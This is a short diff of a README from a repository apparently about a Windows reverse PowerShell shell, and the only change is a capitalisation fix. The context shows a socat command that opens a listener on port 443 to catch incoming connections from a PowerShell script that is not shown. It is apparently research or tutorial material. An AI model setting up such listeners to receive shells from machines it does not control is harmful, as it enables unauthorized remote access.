buzzer-re/mresearch/Windows/reverse_powershell/README.md

 ```shell
 sudo socat -d -d TCP4-LISTEN:443,fork STDOUT
 ```
-This will open our 443 for multiple TCP connections and will print everything in our stdout, the ***-d*** is the debug level, so if you run the Powershell script command above, i will get something like that in our Linux:
+This will open our 443 for multiple TCP connections and will print everything in our stdout, the ***-d*** is the debug level, so if you run the Powershell script command above, I will get something like that in our Linux:

 ```
 $ sudo socat -d -d TCP4-LISTEN:443,fork STDOUT